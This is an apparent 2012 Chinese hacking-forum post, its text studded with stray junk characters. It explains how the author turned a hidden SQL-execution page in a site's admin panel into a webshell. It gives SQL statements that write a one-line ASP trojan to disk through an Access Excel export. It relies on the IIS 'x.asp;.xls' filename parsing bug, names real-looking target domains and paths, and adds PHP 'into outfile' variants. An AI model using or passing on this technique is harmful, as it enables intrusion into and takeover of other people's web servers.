好不容易进了后台,发现啥上传啊。备份啊多木有。. k- m; Y* H" `% d
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的! u1 b3 @6 I& m; Y# L+ y
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,: ~8 ?. x ^6 w# ]
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:$ q3 ^" N% a- l* h: J0 c6 Z& i
1.create table cmd (a varchar(50))
/ \# A X8 ?4 u2.insert into cmd (a) values (‘‘)$ a+ o! _' F8 W; C2 @; }0 S
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
* O. l" g; z& Y ](把表cmd的内容导出为物理路径的一个EXCEL文件)
: L' h2 }, y( q- F) \! j k) a4.drop table cmd5 o# e2 \, W a0 C, T
利用IIS的BUG成功拿到了WEBSHELL。! Z8 n5 N0 l& f* _+ D4 f
& v! s8 F9 b- y% k# Q/ s$ K" d直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
# P, H5 w( D3 f* y e2 ]
Z Q: |" m- B, m; }. K SQL语句意思解释:, @% P; U$ Q3 ^ d
第一句
9 q. l& B5 C) X* g. |, X" I 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50" l; r, q" M4 Z+ Q6 S
4 ^$ D* I; Q- g: X) ?
第二句. H& {9 Q- d( C: ?# l% y" K
在表cmd的a字段插入一句话木马
' J; Q: @$ O2 Y 第三句2 e* U6 M' r% L; C& X: F% W( `
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
. d) r k/ S" r; c' t7 [
; s; {& @. l# Z2 h! |* w' t 第四句' L2 B# f, J' p a' d) u9 n
删除建立的cmd表7 j2 X. z' a* Q
+ n+ g" H! H. ~. _2 J 以下内容为测试:" G7 F, e$ m! H1 L, O3 v% T) _! P! r
Access利用后台SQL执行命令功能导出WebShell:* A0 x. ?1 u3 M3 J+ ?
这个更简单:
" [4 f% o' g; y; r1 n! ? [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
+ G$ l4 T% y" s 或者4 f( U6 q$ U- ~ n
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
+ a- w1 @6 Z+ r. _5 s! f/ H. o8 P/ a1 [6 B
后台有执行SQL语句功能(vote为已知表段)
# `5 j) E3 q5 H, K& [- @ 希望对大家有所帮助拿shell的又一个思路
* T. X$ b. O% P- M |
发表于 2012-9-13 17:53:58
收藏
支持
反对